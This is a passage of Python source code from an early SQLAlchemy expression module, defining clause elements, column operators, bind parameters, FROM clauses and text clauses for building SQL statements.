Same functionality as ``params()``, except adds `unique=True`
to affected bind parameters so that multiple statements can be
used.
"""
return self._params(True, optionaldict, kwargs)
def params(self, *optionaldict, **kwargs):
"""Return a copy with :func:`bindparam()` elments replaced.
Returns a copy of this ClauseElement with :func:`bindparam()`
elements replaced with values taken from the given dictionary::
>>> clause = column('x') + bindparam('foo')
>>> print clause.compile().params
{'foo':None}
>>> print clause.params({'foo':7}).compile().params
{'foo':7}
"""
return self._params(False, optionaldict, kwargs)
def _params(self, unique, optionaldict, kwargs):
if len(optionaldict) == 1:
kwargs.update(optionaldict[0])
elif len(optionaldict) > 1:
raise exc.ArgumentError(
"params() takes zero or one positional dictionary argument")
def visit_bindparam(bind):
if bind.key in kwargs:
bind.value = kwargs[bind.key]
if unique:
bind._convert_to_unique()
return cloned_traverse(self, {}, {'bindparam':visit_bindparam})
def compare(self, other, **kw):
"""Compare this ClauseElement to the given ClauseElement.
Subclasses should override the default behavior, which is a
straight identity comparison.
\**kw are arguments consumed by subclass compare() methods and
may be used to modify the criteria for comparison.
(see :class:`ColumnElement`)
"""
return self is other
def _copy_internals(self, clone=_clone):
"""Reassign internal elements to be clones of themselves.
Called during a copy-and-traverse operation on newly
shallow-copied elements to create a deep copy.
"""
pass
def get_children(self, **kwargs):
"""Return immediate child elements of this :class:`ClauseElement`.
This is used for visit traversal.
\**kwargs may contain flags that change the collection that is
returned, for example to return a subset of items in order to
cut down on larger traversals, or to return child items from a
different context (such as schema-level collections instead of
clause-level).
"""
return []
def self_group(self, against=None):
return self
# TODO: remove .bind as a method from the root ClauseElement.
# we should only be deriving binds from FromClause elements
# and certain SchemaItem subclasses.
# the "search_for_bind" functionality can still be used by
# execute(), however.
@property
def bind(self):
"""Returns the Engine or Connection to which this ClauseElement is
bound, or None if none found.
"""
if self._bind is not None:
return self._bind
for f in _from_objects(self):
if f is self:
continue
engine = f.bind
if engine is not None:
return engine
else:
return None
def execute(self, *multiparams, **params):
"""Compile and execute this :class:`ClauseElement`."""
e = self.bind
if e is None:
label = getattr(self, 'description', self.__class__.__name__)
msg = ('This %s is not bound and does not support direct '
'execution. Supply this statement to a Connection or '
'Engine for execution. Or, assign a bind to the statement '
'or the Metadata of its underlying tables to enable '
'implicit execution via this method.' % label)
raise exc.UnboundExecutionError(msg)
return e._execute_clauseelement(self, multiparams, params)
def scalar(self, *multiparams, **params):
"""Compile and execute this :class:`ClauseElement`, returning the result's
scalar representation.
"""
return self.execute(*multiparams, **params).scalar()
def compile(self, bind=None, dialect=None, **kw):
"""Compile this SQL expression.
The return value is a :class:`~sqlalchemy.engine.Compiled` object.
Calling ``str()`` or ``unicode()`` on the returned value will yield a
string representation of the result. The
:class:`~sqlalchemy.engine.Compiled` object also can return a
dictionary of bind parameter names and values
using the ``params`` accessor.
:param bind: An ``Engine`` or ``Connection`` from which a
``Compiled`` will be acquired. This argument takes precedence over
this :class:`ClauseElement`'s bound engine, if any.
:param column_keys: Used for INSERT and UPDATE statements, a list of
column names which should be present in the VALUES clause of the
compiled statement. If ``None``, all columns from the target table
object are rendered.
:param dialect: A ``Dialect`` instance frmo which a ``Compiled``
will be acquired. This argument takes precedence over the `bind`
argument as well as this :class:`ClauseElement`'s bound engine, if any.
:param inline: Used for INSERT statements, for a dialect which does
not support inline retrieval of newly generated primary key
columns, will force the expression used to create the new primary
key value to be rendered inline within the INSERT statement's
VALUES clause. This typically refers to Sequence execution but may
also refer to any server-side default generation function
associated with a primary key `Column`.
"""
if not dialect:
if bind:
dialect = bind.dialect
elif self.bind:
dialect = self.bind.dialect
bind = self.bind
else:
global DefaultDialect
if DefaultDialect is None:
from sqlalchemy.engine.default import DefaultDialect
dialect = DefaultDialect()
compiler = self._compiler(dialect, bind=bind, **kw)
compiler.compile()
return compiler
def _compiler(self, dialect, **kw):
"""Return a compiler appropriate for this ClauseElement, given a Dialect."""
return dialect.statement_compiler(dialect, self, **kw)
def __str__(self):
# Py3K
#return unicode(self.compile())
# Py2K
return unicode(self.compile()).encode('ascii', 'backslashreplace')
# end Py2K
def __and__(self, other):
return and_(self, other)
def __or__(self, other):
return or_(self, other)
def __invert__(self):
return self._negate()
def __nonzero__(self):
raise TypeError("Boolean value of this clause is not defined")
def _negate(self):
if hasattr(self, 'negation_clause'):
return self.negation_clause
else:
return _UnaryExpression(
self.self_group(against=operators.inv),
operator=operators.inv,
negate=None)
def __repr__(self):
friendly = getattr(self, 'description', None)
if friendly is None:
return object.__repr__(self)
else:
return '<%s.%s at 0x%x; %s>' % (
self.__module__, self.__class__.__name__, id(self), friendly)
class _Immutable(object):
"""mark a ClauseElement as 'immutable' when expressions are cloned."""
def unique_params(self, *optionaldict, **kwargs):
raise NotImplementedError("Immutable objects do not support copying")
def params(self, *optionaldict, **kwargs):
raise NotImplementedError("Immutable objects do not support copying")
def _clone(self):
return self
class Operators(object):
def __and__(self, other):
return self.operate(operators.and_, other)
def __or__(self, other):
return self.operate(operators.or_, other)
def __invert__(self):
return self.operate(operators.inv)
def op(self, opstring):
def op(b):
return self.operate(operators.op, opstring, b)
return op
def operate(self, op, *other, **kwargs):
raise NotImplementedError(str(op))
def reverse_operate(self, op, other, **kwargs):
raise NotImplementedError(str(op))
class ColumnOperators(Operators):
"""Defines comparison and math operations."""
timetuple = None
"""Hack, allows datetime objects to be compared on the LHS."""
def __lt__(self, other):
return self.operate(operators.lt, other)
def __le__(self, other):
return self.operate(operators.le, other)
__hash__ = Operators.__hash__
def __eq__(self, other):
return self.operate(operators.eq, other)
def __ne__(self, other):
return self.operate(operators.ne, other)
def __gt__(self, other):
return self.operate(operators.gt, other)
def __ge__(self, other):
return self.operate(operators.ge, other)
def __neg__(self):
return self.operate(operators.neg)
def concat(self, other):
return self.operate(operators.concat_op, other)
def like(self, other, escape=None):
return self.operate(operators.like_op, other, escape=escape)
def ilike(self, other, escape=None):
return self.operate(operators.ilike_op, other, escape=escape)
def in_(self, other):
return self.operate(operators.in_op, other)
def startswith(self, other, **kwargs):
return self.operate(operators.startswith_op, other, **kwargs)
def endswith(self, other, **kwargs):
return self.operate(operators.endswith_op, other, **kwargs)
def contains(self, other, **kwargs):
return self.operate(operators.contains_op, other, **kwargs)
def match(self, other, **kwargs):
return self.operate(operators.match_op, other, **kwargs)
def desc(self):
return self.operate(operators.desc_op)
def asc(self):
return self.operate(operators.asc_op)
def collate(self, collation):
return self.operate(operators.collate, collation)
def __radd__(self, other):
return self.reverse_operate(operators.add, other)
def __rsub__(self, other):
return self.reverse_operate(operators.sub, other)
def __rmul__(self, other):
return self.reverse_operate(operators.mul, other)
def __rdiv__(self, other):
return self.reverse_operate(operators.div, other)
def between(self, cleft, cright):
return self.operate(operators.between_op, cleft, cright)
def distinct(self):
return self.operate(operators.distinct_op)
def __add__(self, other):
return self.operate(operators.add, other)
def __sub__(self, other):
return self.operate(operators.sub, other)
def __mul__(self, other):
return self.operate(operators.mul, other)
def __div__(self, other):
return self.operate(operators.div, other)
def __mod__(self, other):
return self.operate(operators.mod, other)
def __truediv__(self, other):
return self.operate(operators.truediv, other)
def __rtruediv__(self, other):
return self.reverse_operate(operators.truediv, other)
class _CompareMixin(ColumnOperators):
"""Defines comparison and math operations for :class:`ClauseElement` instances."""
def __compare(self, op, obj, negate=None, reverse=False, **kwargs):
if obj is None or isinstance(obj, _Null):
if op == operators.eq:
return _BinaryExpression(self, null(), operators.is_, negate=operators.isnot)
elif op == operators.ne:
return _BinaryExpression(self, null(), operators.isnot, negate=operators.is_)
else:
raise exc.ArgumentError("Only '='/'!=' operators can be used with NULL")
else:
obj = self._check_literal(obj)
if reverse:
return _BinaryExpression(obj,
self,
op,
type_=sqltypes.BOOLEANTYPE,
negate=negate, modifiers=kwargs)
else:
return _BinaryExpression(self,
obj,
op,
type_=sqltypes.BOOLEANTYPE,
negate=negate, modifiers=kwargs)
def __operate(self, op, obj, reverse=False):
obj = self._check_literal(obj)
if reverse:
left, right = obj, self
else:
left, right = self, obj
if left.type is None:
op, result_type = sqltypes.NULLTYPE._adapt_expression(op, right.type)
elif right.type is None:
op, result_type = left.type._adapt_expression(op, sqltypes.NULLTYPE)
else:
op, result_type = left.type._adapt_expression(op, right.type)
return _BinaryExpression(left, right, op, type_=result_type)
# a mapping of operators with the method they use, along with their negated
# operator for comparison operators
operators = {
operators.add : (__operate,),
operators.mul : (__operate,),
operators.sub : (__operate,),
# Py2K
operators.div : (__operate,),
# end Py2K
operators.mod : (__operate,),
operators.truediv : (__operate,),
operators.lt : (__compare, operators.ge),
operators.le : (__compare, operators.gt),
operators.ne : (__compare, operators.eq),
operators.gt : (__compare, operators.le),
operators.ge : (__compare, operators.lt),
operators.eq : (__compare, operators.ne),
operators.like_op : (__compare, operators.notlike_op),
operators.ilike_op : (__compare, operators.notilike_op),
}
def operate(self, op, *other, **kwargs):
o = _CompareMixin.operators[op]
return o[0](self, op, other[0], *o[1:], **kwargs)
def reverse_operate(self, op, other, **kwargs):
o = _CompareMixin.operators[op]
return o[0](self, op, other, reverse=True, *o[1:], **kwargs)
def in_(self, other):
return self._in_impl(operators.in_op, operators.notin_op, other)
def _in_impl(self, op, negate_op, seq_or_selectable):
seq_or_selectable = _clause_element_as_expr(seq_or_selectable)
if isinstance(seq_or_selectable, _ScalarSelect):
return self.__compare( op, seq_or_selectable, negate=negate_op)
elif isinstance(seq_or_selectable, _SelectBaseMixin):
# TODO: if we ever want to support (x, y, z) IN (select x, y, z from table),
# we would need a multi-column version of as_scalar() to produce a multi-
# column selectable that does not export itself as a FROM clause
return self.__compare( op, seq_or_selectable.as_scalar(), negate=negate_op)
elif isinstance(seq_or_selectable, Selectable):
return self.__compare( op, seq_or_selectable, negate=negate_op)
# Handle non selectable arguments as sequences
args = []
for o in seq_or_selectable:
if not _is_literal(o):
if not isinstance( o, _CompareMixin):
raise exc.InvalidRequestError(
"in() function accepts either a list of non-selectable values, "
"or a selectable: %r" % o)
else:
o = self._bind_param(o)
args.append(o)
if len(args) == 0:
# Special case handling for empty IN's, behave like comparison
# against zero row selectable. We use != to build the
# contradiction as it handles NULL values appropriately, i.e.
# "not (x IN ())" should not return NULL values for x.
util.warn("The IN-predicate on \"%s\" was invoked with an empty sequence. "
"This results in a contradiction, which nonetheless can be "
"expensive to evaluate. Consider alternative strategies for "
"improved performance." % self)
return self != self
return self.__compare(op, ClauseList(*args).self_group(against=op), negate=negate_op)
def __neg__(self):
return _UnaryExpression(self, operator=operators.neg)
def startswith(self, other, escape=None):
"""Produce the clause ``LIKE '<other>%'``"""
# use __radd__ to force string concat behavior
return self.__compare(
operators.like_op,
literal_column("'%'", type_=sqltypes.String).__radd__(self._check_literal(other)),
escape=escape)
def endswith(self, other, escape=None):
"""Produce the clause ``LIKE '%<other>'``"""
return self.__compare(
operators.like_op,
literal_column("'%'", type_=sqltypes.String) + self._check_literal(other),
escape=escape)
def contains(self, other, escape=None):
"""Produce the clause ``LIKE '%<other>%'``"""
return self.__compare(
operators.like_op,
literal_column("'%'", type_=sqltypes.String) +
self._check_literal(other) +
literal_column("'%'", type_=sqltypes.String),
escape=escape)
def match(self, other):
"""Produce a MATCH clause, i.e. ``MATCH '<other>'``
The allowed contents of ``other`` are database backend specific.
"""
return self.__compare(operators.match_op, self._check_literal(other))
def label(self, name):
"""Produce a column label, i.e. ``<columnname> AS <name>``.
if 'name' is None, an anonymous label name will be generated.
"""
return _Label(name, self, self.type)
def desc(self):
"""Produce a DESC clause, i.e. ``<columnname> DESC``"""
return desc(self)
def asc(self):
"""Produce a ASC clause, i.e. ``<columnname> ASC``"""
return asc(self)
def distinct(self):
"""Produce a DISTINCT clause, i.e. ``DISTINCT <columnname>``"""
return _UnaryExpression(self, operator=operators.distinct_op, type_=self.type)
def between(self, cleft, cright):
"""Produce a BETWEEN clause, i.e. ``<column> BETWEEN <cleft> AND <cright>``"""
return _BinaryExpression(
self,
ClauseList(
self._check_literal(cleft),
self._check_literal(cright),
operator=operators.and_,
group=False),
operators.between_op)
def collate(self, collation):
"""Produce a COLLATE clause, i.e. ``<column> COLLATE utf8_bin``"""
return collate(self, collation)
def op(self, operator):
"""produce a generic operator function.
e.g.::
somecolumn.op("*")(5)
produces::
somecolumn * 5
:param operator: a string which will be output as the infix operator between
this :class:`ClauseElement` and the expression passed to the
generated function.
This function can also be used to make bitwise operators explicit. For example::
somecolumn.op('&')(0xff)
is a bitwise AND of the value in somecolumn.
"""
return lambda other: self.__operate(operator, other)
def _bind_param(self, obj):
return _BindParamClause(None, obj, _fallback_type=self.type, unique=True)
def _check_literal(self, other):
if isinstance(other, _BindParamClause) and isinstance(other.type, sqltypes.NullType):
other.type = self.type
return other
elif hasattr(other, '__clause_element__'):
return other.__clause_element__()
elif not isinstance(other, ClauseElement):
return self._bind_param(other)
elif isinstance(other, (_SelectBaseMixin, Alias)):
return other.as_scalar()
else:
return other
class ColumnElement(ClauseElement, _CompareMixin):
"""Represent an element that is usable within the "column clause" portion of a ``SELECT`` statement.
This includes columns associated with tables, aliases, and
subqueries, expressions, function calls, SQL keywords such as
``NULL``, literals, etc. :class:`ColumnElement` is the ultimate base
class for all such elements.
:class:`ColumnElement` supports the ability to be a *proxy* element,
which indicates that the :class:`ColumnElement` may be associated with
a :class:`Selectable` which was derived from another :class:`Selectable`.
An example of a "derived" :class:`Selectable` is an :class:`Alias` of a
:class:`~sqlalchemy.schema.Table`.
A :class:`ColumnElement`, by subclassing the :class:`_CompareMixin` mixin
class, provides the ability to generate new :class:`ClauseElement`
objects using Python expressions. See the :class:`_CompareMixin`
docstring for more details.
"""
__visit_name__ = 'column'
primary_key = False
foreign_keys = []
quote = None
_label = None
@property
def _select_iterable(self):
return (self, )
@util.memoized_property
def base_columns(self):
return util.column_set(c for c in self.proxy_set
if not hasattr(c, 'proxies'))
@util.memoized_property
def proxy_set(self):
s = util.column_set([self])
if hasattr(self, 'proxies'):
for c in self.proxies:
s.update(c.proxy_set)
return s
def shares_lineage(self, othercolumn):
"""Return True if the given :class:`ColumnElement` has a common ancestor to this :class:`ColumnElement`."""
return bool(self.proxy_set.intersection(othercolumn.proxy_set))
def _make_proxy(self, selectable, name=None):
"""Create a new :class:`ColumnElement` representing this
:class:`ColumnElement` as it appears in the select list of a
descending selectable.
"""
if name:
co = ColumnClause(name, selectable, type_=getattr(self, 'type', None))
else:
name = str(self)
co = ColumnClause(self.anon_label, selectable, type_=getattr(self, 'type', None))
co.proxies = [self]
selectable.columns[name] = co
return co
def compare(self, other, use_proxies=False, equivalents=None, **kw):
"""Compare this ColumnElement to another.
Special arguments understood:
:param use_proxies: when True, consider two columns that
share a common base column as equivalent (i.e. shares_lineage())
:param equivalents: a dictionary of columns as keys mapped to sets
of columns. If the given "other" column is present in this dictionary,
if any of the columns in the correponding set() pass the comparison
test, the result is True. This is used to expand the comparison to
other columns that may be known to be equivalent to this one via
foreign key or other criterion.
"""
to_compare = (other, )
if equivalents and other in equivalents:
to_compare = equivalents[other].union(to_compare)
for oth in to_compare:
if use_proxies and self.shares_lineage(oth):
return True
elif oth is self:
return True
else:
return False
@util.memoized_property
def anon_label(self):
"""provides a constant 'anonymous label' for this ColumnElement.
This is a label() expression which will be named at compile time.
The same label() is returned each time anon_label is called so
that expressions can reference anon_label multiple times, producing
the same label name at compile time.
the compiler uses this function automatically at compile time
for expressions that are known to be 'unnamed' like binary
expressions and function calls.
"""
return _generated_label("%%(%d %s)s" % (id(self), getattr(self, 'name', 'anon')))
class ColumnCollection(util.OrderedProperties):
"""An ordered dictionary that stores a list of ColumnElement
instances.
Overrides the ``__eq__()`` method to produce SQL clauses between
sets of correlated columns.
"""
def __init__(self, *cols):
super(ColumnCollection, self).__init__()
self.update((c.key, c) for c in cols)
def __str__(self):
return repr([str(c) for c in self])
def replace(self, column):
"""add the given column to this collection, removing unaliased versions of this column
as well as existing columns with the same key.
e.g.::
t = Table('sometable', metadata, Column('col1', Integer))
t.columns.replace(Column('col1', Integer, key='columnone'))
will remove the original 'col1' from the collection, and add
the new column under the name 'columnname'.
Used by schema.Column to override columns during table reflection.
"""
if column.name in self and column.key != column.name:
other = self[column.name]
if other.name == other.key:
del self[other.name]
util.OrderedProperties.__setitem__(self, column.key, column)
def add(self, column):
"""Add a column to this collection.
The key attribute of the column will be used as the hash key
for this dictionary.
"""
self[column.key] = column
def __setitem__(self, key, value):
if key in self:
# this warning is primarily to catch select() statements which have conflicting
# column names in their exported columns collection
existing = self[key]
if not existing.shares_lineage(value):
util.warn(("Column %r on table %r being replaced by another "
"column with the same key. Consider use_labels "
"for select() statements.") % (key, getattr(existing, 'table', None)))
util.OrderedProperties.__setitem__(self, key, value)
def remove(self, column):
del self[column.key]
def extend(self, iter):
for c in iter:
self.add(c)
__hash__ = None
def __eq__(self, other):
l = []
for c in other:
for local in self:
if c.shares_lineage(local):
l.append(c==local)
return and_(*l)
def __contains__(self, other):
if not isinstance(other, basestring):
raise exc.ArgumentError("__contains__ requires a string argument")
return util.OrderedProperties.__contains__(self, other)
def contains_column(self, col):
# have to use a Set here, because it will compare the identity
# of the column, not just using "==" for comparison which will always return a
# "True" value (i.e. a BinaryClause...)
return col in util.column_set(self)
class ColumnSet(util.ordered_column_set):
def contains_column(self, col):
return col in self
def extend(self, cols):
for col in cols:
self.add(col)
def __add__(self, other):
return list(self) + list(other)
def __eq__(self, other):
l = []
for c in other:
for local in self:
if c.shares_lineage(local):
l.append(c==local)
return and_(*l)
def __hash__(self):
return hash(tuple(x for x in self))
class Selectable(ClauseElement):
"""mark a class as being selectable"""
__visit_name__ = 'selectable'
class FromClause(Selectable):
"""Represent an element that can be used within the ``FROM``
clause of a ``SELECT`` statement.
"""
__visit_name__ = 'fromclause'
named_with_column = False
_hide_froms = []
quote = None
schema = None
def count(self, whereclause=None, **params):
"""return a SELECT COUNT generated against this :class:`FromClause`."""
if self.primary_key:
col = list(self.primary_key)[0]
else:
col = list(self.columns)[0]
return select(
[func.count(col).label('tbl_row_count')],
whereclause,
from_obj=[self],
**params)
def select(self, whereclause=None, **params):
"""return a SELECT of this :class:`FromClause`."""
return select([self], whereclause, **params)
def join(self, right, onclause=None, isouter=False):
"""return a join of this :class:`FromClause` against another :class:`FromClause`."""
return Join(self, right, onclause, isouter)
def outerjoin(self, right, onclause=None):
"""return an outer join of this :class:`FromClause` against another :class:`FromClause`."""
return Join(self, right, onclause, True)
def alias(self, name=None):
"""return an alias of this :class:`FromClause`.
For table objects, this has the effect of the table being rendered
as ``tablename AS aliasname`` in a SELECT statement.
For select objects, the effect is that of creating a named
subquery, i.e. ``(select ...) AS aliasname``.
The :func:`alias()` method is the general way to create
a "subquery" out of an existing SELECT.
The ``name`` parameter is optional, and if left blank an
"anonymous" name will be generated at compile time, guaranteed
to be unique against other anonymous constructs used in the
same statement.
"""
return Alias(self, name)
def is_derived_from(self, fromclause):
"""Return True if this FromClause is 'derived' from the given FromClause.
An example would be an Alias of a Table is derived from that Table.
"""
return fromclause in self._cloned_set
def replace_selectable(self, old, alias):
"""replace all occurences of FromClause 'old' with the given Alias
object, returning a copy of this :class:`FromClause`.
"""
global ClauseAdapter
if ClauseAdapter is None:
from sqlalchemy.sql.util import ClauseAdapter
return ClauseAdapter(alias).traverse(self)
def correspond_on_equivalents(self, column, equivalents):
"""Return corresponding_column for the given column, or if None
search for a match in the given dictionary.
"""
col = self.corresponding_column(column, require_embedded=True)
if col is None and col in equivalents:
for equiv in equivalents[col]:
nc = self.corresponding_column(equiv, require_embedded=True)
if nc:
return nc
return col
def corresponding_column(self, column, require_embedded=False):
"""Given a :class:`ColumnElement`, return the exported :class:`ColumnElement`
object from this :class:`Selectable` which corresponds to that
original :class:`~sqlalchemy.schema.Column` via a common anscestor column.
:param column: the target :class:`ColumnElement` to be matched
:param require_embedded: only return corresponding columns for the given
:class:`ColumnElement`, if the given :class:`ColumnElement` is
actually present within a sub-element of this
:class:`FromClause`. Normally the column will match if it merely
shares a common anscestor with one of the exported columns
of this :class:`FromClause`.
"""
# dont dig around if the column is locally present
if self.c.contains_column(column):
return column
col, intersect = None, None
target_set = column.proxy_set
cols = self.c
for c in cols:
i = target_set.intersection(itertools.chain(*[p._cloned_set for p in c.proxy_set]))
if i and \
(not require_embedded or c.proxy_set.issuperset(target_set)):
if col is None:
# no corresponding column yet, pick this one.
col, intersect = c, i
elif len(i) > len(intersect):
# 'c' has a larger field of correspondence than 'col'.
# i.e. selectable.c.a1_x->a1.c.x->table.c.x matches
# a1.c.x->table.c.x better than
# selectable.c.x->table.c.x does.
col, intersect = c, i
elif i == intersect:
# they have the same field of correspondence.
# see which proxy_set has fewer columns in it, which indicates
# a closer relationship with the root column. Also take into
# account the "weight" attribute which CompoundSelect() uses to
# give higher precedence to columns based on vertical position
# in the compound statement, and discard columns that have no
# reference to the target column (also occurs with
# CompoundSelect)
col_distance = util.reduce(operator.add,
[sc._annotations.get('weight', 1)
for sc in col.proxy_set
if sc.shares_lineage(column)]
)
c_distance = util.reduce(operator.add,
[sc._annotations.get('weight', 1)
for sc in c.proxy_set
if sc.shares_lineage(column)]
)
if c_distance < col_distance:
col, intersect = c, i
return col
@property
def description(self):
"""a brief description of this FromClause.
Used primarily for error message formatting.
"""
return getattr(self, 'name', self.__class__.__name__ + " object")
def _reset_exported(self):
"""delete memoized collections when a FromClause is cloned."""
for attr in ('_columns', '_primary_key' '_foreign_keys', 'locate_all_froms'):
self.__dict__.pop(attr, None)
@util.memoized_property
def _columns(self):
"""Return the collection of Column objects contained by this FromClause."""
self._export_columns()
return self._columns
@util.memoized_property
def _primary_key(self):
"""Return the collection of Column objects which comprise the primary key of this FromClause."""
self._export_columns()
return self._primary_key
@util.memoized_property
def _foreign_keys(self):
"""Return the collection of ForeignKey objects which this FromClause references."""
self._export_columns()
return self._foreign_keys
columns = property(attrgetter('_columns'), doc=_columns.__doc__)
primary_key = property(
attrgetter('_primary_key'),
doc=_primary_key.__doc__)
foreign_keys = property(
attrgetter('_foreign_keys'),
doc=_foreign_keys.__doc__)
# synonyms for 'columns'
c = _select_iterable = property(attrgetter('columns'), doc=_columns.__doc__)
def _export_columns(self):
"""Initialize column collections."""
self._columns = ColumnCollection()
self._primary_key = ColumnSet()
self._foreign_keys = set()
self._populate_column_collection()
def _populate_column_collection(self):
pass
class _BindParamClause(ColumnElement):
"""Represent a bind parameter.
Public constructor is the :func:`bindparam()` function.
"""
__visit_name__ = 'bindparam'
quote = None
def __init__(self, key, value, type_=None, unique=False,
isoutparam=False, required=False,
_fallback_type=None):
"""Construct a _BindParamClause.
key
the key for this bind param. Will be used in the generated
SQL statement for dialects that use named parameters. This
value may be modified when part of a compilation operation,
if other :class:`_BindParamClause` objects exist with the same
key, or if its length is too long and truncation is
required.
value
Initial value for this bind param. This value may be
overridden by the dictionary of parameters sent to statement
compilation/execution.
type\_
A ``TypeEngine`` object that will be used to pre-process the
value corresponding to this :class:`_BindParamClause` at
execution time.
unique
if True, the key name of this BindParamClause will be
modified if another :class:`_BindParamClause` of the same name
already has been located within the containing
:class:`ClauseElement`.
required
a value is required at execution time.
isoutparam
if True, the parameter should be treated like a stored procedure "OUT"
parameter.
"""
if unique:
self.key = _generated_label("%%(%d %s)s" % (id(self), key or 'param'))
else:
self.key = key or _generated_label("%%(%d param)s" % id(self))
self._orig_key = key or 'param'
self.unique = unique
self.value = value
self.isoutparam = isoutparam
self.required = required
if type_ is None:
self.type = sqltypes.type_map.get(type(value), _fallback_type or sqltypes.NULLTYPE)
if _fallback_type and _fallback_type._type_affinity == self.type._type_affinity:
self.type = _fallback_type
elif isinstance(type_, type):
self.type = type_()
else:
self.type = type_
def _clone(self):
c = ClauseElement._clone(self)
if self.unique:
c.key = _generated_label("%%(%d %s)s" % (id(c), c._orig_key or 'param'))
return c
def _convert_to_unique(self):
if not self.unique:
self.unique = True
self.key = _generated_label("%%(%d %s)s" % (id(self), self._orig_key or 'param'))
def bind_processor(self, dialect):
return self.type.dialect_impl(dialect).bind_processor(dialect)
def compare(self, other, **kw):
"""Compare this :class:`_BindParamClause` to the given clause."""
return isinstance(other, _BindParamClause) and \
self.type._compare_type_affinity(other.type) and \
self.value == other.value
def __getstate__(self):
"""execute a deferred value for serialization purposes."""
d = self.__dict__.copy()
v = self.value
if util.callable(v):
v = v()
d['value'] = v
return d
def __repr__(self):
return "_BindParamClause(%r, %r, type_=%r)" % (
self.key, self.value, self.type
)
class _TypeClause(ClauseElement):
"""Handle a type keyword in a SQL statement.
Used by the ``Case`` statement.
"""
__visit_name__ = 'typeclause'
def __init__(self, type):
self.type = type
class _Generative(object):
"""Allow a ClauseElement to generate itself via the
@_generative decorator.
"""
def _generate(self):
s = self.__class__.__new__(self.__class__)
s.__dict__ = self.__dict__.copy()
return s
class Executable(_Generative):
"""Mark a ClauseElement as supporting execution."""
supports_execution = True
_execution_options = util.frozendict()
@_generative
def execution_options(self, **kw):
""" Set non-SQL options for the statement which take effect during execution.
Current options include:
* autocommit - when True, a COMMIT will be invoked after execution
when executed in 'autocommit' mode, i.e. when an explicit transaction
is not begun on the connection. Note that DBAPI connections by
default are always in a transaction - SQLAlchemy uses rules applied
to different kinds of statements to determine if COMMIT will be invoked
in order to provide its "autocommit" feature. Typically, all
INSERT/UPDATE/DELETE statements as well as CREATE/DROP statements
have autocommit behavior enabled; SELECT constructs do not. Use this
option when invokving a SELECT or other specific SQL construct
where COMMIT is desired (typically when calling stored procedures
and such).
* stream_results - indicate to the dialect that results should be
"streamed" and not pre-buffered, if possible. This is a limitation
of many DBAPIs. The flag is currently understood only by the
psycopg2 dialect.
"""
self._execution_options = self._execution_options.union(kw)
# legacy, some outside users may be calling this
_Executable = Executable
class _TextClause(Executable, ClauseElement):
"""Represent a literal SQL text fragment.
Public constructor is the :func:`text()` function.
"""
__visit_name__ = 'textclause'
_bind_params_regex = re.compile(r'(?<![:\w\x5c]):(\w+)(?!:)', re.UNICODE)
_execution_options = Executable._execution_options.union({'autocommit':PARSE_AUTOCOMMIT})
@property
def _select_iterable(self):
return (self,)
_hide_froms = []
def __init__(self, text = "", bind=None,
bindparams=None, typemap=None,
autocommit=None):
self._bind = bind
self.bindparams = {}
self.typemap = typemap
if autocommit is not None:
util.warn_deprecated("autocommit on text() is deprecated. "
"Use .execution_options(autocommit=True)")
self._execution_options = self._execution_options.union({'autocommit':autocommit})
if typemap is not None:
for key in typemap.keys():
typemap[key] = sqltypes.to_instance(typemap[key])
def repl(m):
self.bindparams[m.group(1)] = bindparam(m.group(1))
return ":%s" % m.group(1)
# scan the string and search for bind parameter names, add them
# to the list of bindparams
self.text = self._bind_params_regex.sub(repl, text)
if bindparams is not None:
for b in bindparams:
self.bindparams[b.key] = b
@property
def type(self):
if self.typemap is not None and len(self.typemap) == 1:
return list(self.typemap)[0]
else:
return None
def _copy_internals(self, clone=_clone):
self.bindparams = dict((b.key, clone(b))
for b in self.bindparams.values())
def get_children(self, **kwargs):
return self.bindparams.values()
class _Null(ColumnElement):
"""Represent the NULL keyword in a SQL statement.
Public constructor is the :func:`null()` function.
"""
__visit_name__ = 'null'
def __init__(self):
self.type = sqltypes.NULLTYPE
class ClauseList(ClauseElement):
"""Describe a list of clauses, separated by an operator.
By default, is comma-separated, such as a column listing.
"""
__visit_name__ = 'clauselist'
def __init__(self, *clauses, **kwargs):
self.operator = kwargs.pop('operator', operators.comma_op)
self.group = kwargs.pop('group', True)
self.group_contents = kwargs.pop('group_contents', True)
if self.group_contents:
self.clauses = [
_literal_as_text(clause).self_group(against=self.operator)
for clause in clauses if clause is not None]
else:
self.clauses = [
_literal_as_text(clause)
for clause in clauses if clause is not None]
@util.memoized_property
def type(self):
if self.clauses:
return self.clauses[0].type
else:
return sqltypes.NULLTYPE
def __iter__(self):
return iter(self.clauses)
def __len__(self):
return len(self.clauses)
@property
def _select_iterable(self):
return iter(self)
def append(self, clause):
# TODO: not sure if i like the 'group_contents' flag. need to
# define the difference between a ClauseList of ClauseLists,
# and a "flattened" ClauseList of ClauseLists. flatten()
# method ?
if self.group_contents:
self.clauses.append(_literal_as_text(clause).self_group(against=self.operator))
else:
self.clauses.append(_literal_as_text(clause))
def _copy_internals(self, clone=_clone):
self.clauses = [clone(clause) for clause in self.clauses]
def get_children(self, **kwargs):
return self.clauses
@property
def _from_objects(self):
return list(itertools.chain(*[c._from_objects for c in self.clauses]))
def self_group(self, against=None):
if self.group and self.operator is not against and \
operators.is_precedent(self.operator, against):
return _Grouping(self)
else:
return self
def compare(self, other, **kw):
"""Compare this :class:`ClauseList` to the given :class:`ClauseList`,
including a comparison of all the clause items.
"""
if not isinstance(other, ClauseList) and len(self.clauses) == 1:
return self.clauses[0].compare(other, **kw)
elif isinstance(other, ClauseList) and len(self.clauses) == len(other.clauses):
for i in range(0, len(self.clauses)):
if not self.clauses[i].compare(other.clauses[i], **kw):
return False
else:
return self.operator == other.operator
else:
return False
class BooleanClauseList(ClauseList, ColumnElement):
__visit_name__ = 'clauselist'
def __init__(self, *clauses, **kwargs):
super(BooleanClauseList, self).__init__(*clauses, **kwargs)
self.type = sqltypes.to_instance(kwargs.get('type_', sqltypes.Boolean))
@property
def _select_iterable(self):
return (self, )
class _Tuple(ClauseList, ColumnElement):
def __init__(self, *clauses, **kw):
clauses = [_literal_as_binds(c) for c in clauses]
super(_Tuple, self).__init__(*clauses, **kw)
self.type = _type_from_args(clauses)
@property
def _select_iterable(self):
return (self, )
def _bind_param(self, obj):
return _Tuple(*[
_BindParamClause(None, o, _fallback_type=self.type, unique=True)
for o in obj
]).self_group()
class _Case(ColumnElement):
__visit_name__ = 'case'
def __init__(self, whens, value=None, else_=None):
try:
whens = util.dictlike_iteritems(whens)
except TypeError:
pass
if value is not None:
whenlist = [
